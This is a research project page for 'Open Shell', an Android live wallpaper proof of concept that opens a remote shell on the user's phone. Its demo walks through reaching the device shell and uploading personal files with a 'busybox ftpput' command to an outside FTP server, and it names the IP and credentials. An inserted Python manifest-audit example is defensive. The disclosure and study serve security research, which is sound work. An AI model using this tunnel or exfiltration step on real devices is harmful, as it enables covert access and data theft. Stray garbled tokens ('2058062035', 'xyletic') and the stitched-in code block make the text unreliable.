Open Shell
An exploit of user trust with an Android live wallpaper.

The basic premise is that users need to be wary of permissions when they install an application on Android.
We demonstrate how this trust can be violated by gaining shell access to the device and executing arbitrary commands.
One point of note is that the full network access permission is not required to send data to the Internet, only to receive it.
Even more notable is that this permission is almost entirely hidden in later versions of Android, downplaying the risk.
The demo guide can be found below, along with the 2058062035
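
The permission concern described above can be checked before installing an app by reading its decoded AndroidManifest.xml and flagging a live wallpaper service that is combined with the network permission. This is an added example, not code from the Open Shell project; the sample manifest, the package name and the audit_manifest helper are constructed for illustration, and it assumes the manifest has already been decoded to text XML.

```python
import xml.etree.ElementTree as ET

# Attribute names in a manifest live in the android: XML namespace.
A = "{http://schemas.android.com/apk/res/android}"

INTERNET = "android.permission.INTERNET"
BIND_WALLPAPER = "android.permission.BIND_WALLPAPER"
WALLPAPER_ACTION = "android.service.wallpaper.WallpaperService"

# Constructed sample manifest; not taken from the Open Shell app.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.cubewallpaper">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Cube">
    <service android:name=".CubeService"
        android:permission="android.permission.BIND_WALLPAPER">
      <intent-filter>
        <action android:name="android.service.wallpaper.WallpaperService"/>
      </intent-filter>
    </service>
  </application>
</manifest>
"""


def audit_manifest(xml_text):
    """Report requested permissions and live wallpaper services in a manifest."""
    root = ET.fromstring(xml_text)
    perms = sorted({e.get(A + "name") for e in root.iter("uses-permission")
                    if e.get(A + "name")})
    wallpapers = []
    for svc in root.iter("service"):
        actions = {a.get(A + "name") for a in svc.iter("action")}
        # A live wallpaper is a service guarded by BIND_WALLPAPER and/or
        # answering the WallpaperService intent action.
        if svc.get(A + "permission") == BIND_WALLPAPER or WALLPAPER_ACTION in actions:
            wallpapers.append(svc.get(A + "name"))
    return {
        "package": root.get("package"),
        "permissions": perms,
        "wallpaper_services": wallpapers,
        # A wallpaper only draws to the screen; network access deserves review.
        "flag": bool(wallpapers) and INTERNET in perms,
    }


if __name__ == "__main__":
    print(audit_manifest(SAMPLE_MANIFEST))
```

A flagged result is a prompt for manual review, since some wallpapers have legitimate reasons to use the network.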

Demo

The first step is to install the app, which can be found under the downloads section.
Next, go to our demo.
You should see a dark grey page with a Terminal: SSH box in the middle. If the Terminal: SSH option doesn't appear, refresh the page. This can be a first-view issue.
Click on the Terminal: SSH box to start a new terminal. It will request the following information:
Host/IP: openshell.nextproject.ca Port: 2222 User: demo Password: demopassword
After entering all the info and logging in, go to your device settings, display and wallpapers, and set "Open Shell - Cube" as your wallpaper.
Setting the wallpaper establishes a connection with the server, and viewing the wallpaper will show which port it has connected on.
To gain access to your session, type screen -r in the terminal, followed by the port number shown on your screen, e.g. screen -r 10000
You should now be connected to your device and see this indicated on the screen, meaning you're able to issue commands now!
Try entering ls to see if it's working. If a few files are listed, you're ready to go!
You now have shell access to your Android device. This isn't root access, but you still have a scary amount of power!
Feel free to poke around your device now if you're familiar with shell commands, but I'll give an example below.
If any of the commands seem to hang, try pressing Ctrl + C to abort them, or reconnecting to the site and resetting the wallpaper if disconnected.
To close the tunnel intentionally, type exit in the terminal, hit the X in the top-right, change your wallpaper and reboot your device, or uninstall the app.

Demo (Advanced)

For a good example of how this could be used maliciously, the following guides you through uploading one of your files to our test FTP server.
To try this out, browse to some of your files, such as those in Download or DCIM/Camera; for example, try cd /sdcard/Download and then ls to find a file.
Once you have found a suitable file to transfer, we can move it to the app directory with cp FILENAME /data/data/com.nextproject.openshell/files
Now that it is in the app files, we can move back to that folder with cd /data/data/com.nextproject.openshell/files
Lastly, we use ./busybox ftpput -u ftpdemo -p ftppassword -P 2121 138.197.136.154 /files/FILENAME FILENAME
For those interested, more information on busybox can be xyletic
The version used in this app may be a little outdated depending on your time of viewing, but it still adds a lot of commands to our shell!
The file should now be located on the FTP server I set up for this demo, which you can check for yourself with the same credentials.
Host/IP: openshell.nextproject.ca Port: 2121 User: ftpdemo Password: ftppassword
Use an FTP client like WinSCP, FileZilla, etc. to see the file with the above credentials, and delete it afterwards for your own privacy.
All uploaded files will be periodically removed at an indeterminate interval, but it's always good to be safe!
Beyond peeking at your files, the shell access can execute other commands, such as those exposed in the interfaces of other applications.
Again, to close the tunnel intentionally, type exit in the terminal, hit the X in the top-right, change your wallpaper and reboot your device, or uninstall the app.

Developers

In the event that our server becomes overloaded with requests and the demo ceases to function, we invite you to try it yourself!
In the Downloads section to follow you will find the GitHub repositories for all of the code used for the website and app.
Detailed instructions and scripts are provided in these repositories and the site is Dockerized for easier deployment.
Should you find some addition that could be of benefit to either the site or the app, we would love to hear about it!
Please do not hesitate to create an issue/pull request on GitHub or contact us via email to discuss or improve Open Shell.

Downloads

Our app can be found on Google Play on supported devices:
The APK file you have to install on your Android device to try out the demo can also be downloaded directly.
The formal research paper containing the theory and background behind this exploit can be downloaded here.
The GitHub page where the code for this site and the Docker containers used for the demo can be found here.
The GitHub page where the code for the Android app using Android Studio can be found here.

Citation

Please use the following reference in citing this research and application:

Mahmoud, Q.H., Kauling, D., and Zanin, S. “Hidden Android Permissions: Remote Code Execution and Shell Access using a Live Wallpaper”
In Proceedings of the 14th IEEE Annual Consumer Communications & Networking Conference (CCNC 2017), Las Vegas, NV, USA, Jan 2017, pp. 598-599.

Contact

This website and live demonstration were created by Dylan Kauling, but the concept is not mine!
The exploit/app was created by a student under the guidance of Dr. Qusay Mahmoud at UOIT.
If you have any questions about the concept and applications, contact Dr. Mahmoud.
If you have any technical questions about the demo or are having trouble getting it working, feel free to shoot me an email!

Google Play and the Google Play logo are trademarks of Google Inc.